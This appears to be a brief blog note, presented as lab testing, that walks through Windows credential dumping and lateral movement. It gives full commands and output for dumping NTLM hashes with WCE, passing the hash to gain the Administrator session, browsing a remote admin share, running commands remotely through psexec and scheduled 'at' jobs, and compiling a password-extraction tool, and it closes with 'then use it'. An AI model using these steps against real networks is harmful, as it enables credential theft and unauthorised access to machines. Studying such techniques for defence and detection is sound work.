Testing some hashdump and lateral movement techniques

Some time ago I tested some techniques, now published quick & dirty as a note to whom it might be interesting.

Test WCE
Source: http://www.ampliasecurity.com

E:\wce_v1_42beta_x32>wce
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by
Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Administrator:ACME:E52CAC67419A9A224A3B10XXXXXXXXXX:8846F7EAEE8FB118AB06BDXXXXXXXXXX
dax:DAX-RYMZ48Z3EYO:E52CAC67419A9A224A3B10XXXXXXXXXX:8846F7EAEE8FB118AB06BDXXXXXXXXXX
DAX-RYMZ48Z3EYO$:ACME:00000000000000000000000000000000:4460E0BCB8CCF37D8A9E81XXXXXXXXXX

E:\wce_v1_42beta_x32>wce -s Administrator:ACME:E52CAC67419A9A224A3B10XXXXXXXXXX:8846F7EAEE8FB118AB06BDXXXXXXXXXX
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by
Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Changing NTLM credentials of current logon session (00168AB3h) to:
Username: Administrator
domain: ACME
LMHash: E52CAC67419A9A224A3B10XXXXXXXXXX
NTHash: 8846F7EAEE8FB118AB06BDXXXXXXXXXX
NTLM credentials successfully changed!

E:\wce_v1_42beta_x32>dir \\192.168.16.2\c$
Volume in Laufwerk \\192.168.16.2\c$: hat keine Bezeichnung.
Volumeseriennummer: 5450-733C

Verzeichnis von \\192.168.16.2\c$

21.05.2016 14:44 0 AUTOEXEC.BAT
21.05.2016 15:56

ClientApps
21.05.2016 14:44 0 CONFIG.SYS
21.05.2016 15:00Dokumente und Einstellungen
21.05.2016 17:33 2.229.504 Exchange Server Setup Progress.log
21.05.2016 15:24fax
21.05.2016 15:51Inetpub
21.05.2016 15:52Programme
21.05.2016 15:51Users Shared Folders
21.05.2016 17:33WINDOWS
21.05.2016 14:50wmpub
3 Datei(en) 2.229.504 Bytes
8 Verzeichnis(se), 16.708.521.984 Bytes frei

But for remote execution psexec is needed:

E:\wce_v1_42beta_x32>..\PSTools\psexec \\192.168.16.2 ipconfig

PsExec v2.11 - Execute processes remotely
Copyright (C) 2001-2014 Mark Russinovich
Sysinternals - http://www.sysinternals.com

Windows-IP-Konfiguration

Ethernet-Adapter LAN-Verbindung des Servers:

Verbindungsspezifisches DNS-Suffix:
IP-Adresse. . . . . . . . . . . . : 192.168.16.2
Subnetzmaske . . . . . . . . . . : 255.255.255.0
Standardgateway . . . . . . . . . :
ipconfig exited on 192.168.16.2 with error code 0.

E:\wce_v1_42beta_x32>copy wce.exe \\192.168.16.2\c$
1 Datei(en) kopiert.

-> worked

E:\wce_v1_42beta_x32>del wce.exe \\192.168.16.2\c$
Möchten Sie "\\192.168.16.2\c$\*" löschen (J/N)? J

E:\wce_v1_42beta_x32>md \\192.168.16.2\c$\temp

Running commands with at

E:\wce_v1_42beta_x32>at \\192.168.16.2 18:35 cmd /c "ipconfig > c:\temp\ipconf.t
xt"
Neuer Auftrag hinzugefügt. Kennung = 1

E:\wce_v1_42beta_x32>move \\192.168.16.2\c$\temp\ipconf.txt .

E:\wce_v1_42beta_x32>type ipconf.txt

Windows-IP-Konfiguration

Ethernet-Adapter LAN-Verbindung des Servers:

Verbindungsspezifisches DNS-Suffix:
IP-Adresse. . . . . . . . . . . . : 192.168.16.2
Subnetzmaske . . . . . . . . . . : 255.255.255.0
Standardgateway . . . . . . . . . :

Test pwdump

Source (seems to be down):
http://52.25.198.231/blog/2015/09/02/reading-windows-password/
https://github.com/khuangia/wce
Fork:
https://github.com/govolution/wce

32Bit only as far as I remember.

C:\Dokumente und Einstellungen\dax\Eigene Dateien\getpwd>cl getpwd.cpp /link ps
api.lib advapi32.lib
Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 15.00.30729.01 for 80x86
Copyright (C) Microsoft Corporation. All rights reserved.

getpwd.cpp
Microsoft (R) Incremental Linker Version 9.00.30729.01
Copyright (C) Microsoft Corporation. All rights reserved.

/out:getpwd.exe
psapi.lib
advapi32.lib
getpwd.obj

C:\Dokumente und Einstellungen\dax\Eigene Dateien\getpwd>cl /LD getpwd_dll.cpp
Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 15.00.30729.01 for 80x86
Copyright (C) Microsoft Corporation. All rights reserved.

getpwd_dll.cpp
Microsoft (R) Incremental Linker Version 9.00.30729.01
Copyright (C) Microsoft Corporation. All rights reserved.

/out:getpwd_dll.dll
/dll
/implib:getpwd_dll.lib
getpwd_dll.obj
Creating library getpwd_dll.lib and object getpwd_dll.exp

-> then use it ;).

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.